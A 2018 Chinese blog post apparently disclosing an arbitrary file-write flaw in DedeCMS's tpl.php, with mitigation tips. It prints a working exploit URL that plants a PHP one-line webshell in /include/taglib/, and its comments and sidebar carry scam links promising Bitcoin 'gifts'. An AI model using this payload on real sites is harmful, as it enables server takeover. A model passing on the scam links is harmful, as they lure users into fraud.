织梦CMS最新任意写入漏洞 - 小灰博客

织梦CMS最新任意写入漏洞

文章来源：小灰博客| 时间：2018-07-30 16:32:20| 作者：Leo　| 4 条评论

文章分类：IT技术分享、PHP、安全技术标签： dedecms、Leo、PHP

今天服务器提示有webshell文件，上去看下确实是被写入了一句话木马。顺藤摸瓜发现织梦/dede/tpl.php竟然存在任意写入漏洞，也不知道这个漏洞有多久了，是否被公开，既然发现了就记录下把，具体是利用tpl.php的文件管理功能，对标签的一个写入漏洞。exp是这样的

1	www.xxx.com/dede/tpl.php?action=savetagfile&actiondo=addnewtag&content=%3C?php%20$s=create_function(%27%27,$_REQUEST[x]);$s();?%3E&filename=leo.lib.php

访问确定后会在/include/taglib/目录下面生成一个叫leo.lib.php的文件。这个文件里面是一句话木马，就是url里写的PHP代码，如图

(图丢了，自己领悟)

具体想写什么在url里带入就行，接下来上菜刀，链接即可。需要注意一点，生成的文件名必须是 xxx.lib.php

具体防护方法修改后台路径肯定是必不可少的，当然现在曝下织梦路径也不是什么难事，首先可以关闭/include/taglib/下的写入权限，其次其实很多网站根本用不着文件管理器，建议直接把tpl.php文件删除或者重命名。

如果该文章帮到了您，不妨帮忙分享支持下博主！
同时也欢迎各位技术爱好者加入IT技术群（点击即可）：70035098　互相交流学习！

分享该文章到：

4条评论

You have received 1 message № 566. Read >> https://telegra.ph/Go-to-your-personal-cabinet-08-25?hs=8b618b6f3e2558ea545b01f25c66ea45&说道：

2024 年 10 月 29 日上午 2:08

ctoq4z

回复
今日头条说道：

2019 年 10 月 28 日下午 11:44

文章不错支持一下吧

回复
头条说道：

2019 年 1 月 24 日下午 11:37

文章不错非常喜欢

回复
骨骼尚美说道：

2018 年 12 月 9 日下午 10:59

不错的文章,学习了

回复

发表回复取消回复

分类

Android (4)
ASP (4)
HTML (29)
IOS (8)
IT技术分享 (161)
Javascript (21)
MYSQL (12)
Photoshop (1)
PHP (71)
SEO (4)
Windows (17)
其他 (34)
安全技术 (19)
小技巧 (47)
小灰闲谈 (10)
心情随写 (8)
程序囧事 (44)

IT技术分享

最新评论

You have a gift from our company. GЕТ >> https://telegra.ph/Go-to-your-personal-cabinet-08-25?hs=9e710a17c6f1893b8975843ad65a53ec&:mmcrid
Message; + 1.821 BTC. Receive => https://telegra.ph/Go-to-your-personal-cabinet-08-25?hs=288b547ad0b0b6df04e6cda847129548&:zy0yat
You have a gift from user. GЕТ > https://telegra.ph/Go-to-your-personal-cabinet-08-25?hs=164145d501515772aa4824d0b8561afe&:jubf9l
Message: Process #XI77. ASSURE =>> https://telegra.ph/Go-to-your-personal-cabinet-08-25?hs=d5ea508b8dcc5925b48f4f5f95b69369&:hst2ca
Notification- Process #WG96. NEXT >>> https://telegra.ph/Go-to-your-personal-cabinet-08-25?hs=f4f7ece997f382758bf7917d8d281a38&:30jg5l
You have received 1 message № 566. Read >> https://telegra.ph/Go-to-your-personal-cabinet-08-25?hs=8b618b6f3e2558ea545b01f25c66ea45&:ctoq4z
Ticket- Operation 1.82687 BTC. Next > https://telegra.ph/Go-to-your-personal-cabinet-08-25?hs=78faf331ce944e7f6d74e3f488bda258&:ls34jm
QAQ:要實名制啦...不能用QAQ
Hello World! https://national-team.top/go/hezwgobsmq5dinbw?hs=9e710a17c6f1893b8975843ad65a53ec:tavjfc
Hello World! https://national-team.top/go/hezwgobsmq5dinbw?hs=d10fa0f01c28120a8a67cc553684d85a:yhlzth
Hello World! https://national-team.top/go/hezwgobsmq5dinbw?hs=82b659c095cace05cbef312726b6e1d9:no5bkb
Hello World! https://national-team.top/go/hezwgobsmq5dinbw?hs=f4f7ece997f382758bf7917d8d281a38:thx8xj
Hello World! https://national-team.top/go/hezwgobsmq5dinbw?hs=e8e513973712a3c92cfc5061bded6465:8kow6n
Hello World! https://national-team.top/go/hezwgobsmq5dinbw?hs=661bdfd9e71cbca7a188c8b6bfd0106a:p6gq3q
Leo:212121
黑客:dddddd :lol: :mad: :roll:
Leo:111
匿名者:哈哈啊哈
今日新闻头条:似此星辰非昨夜，为谁风露立中宵。 https://china
小黑:我就被骗了

链接表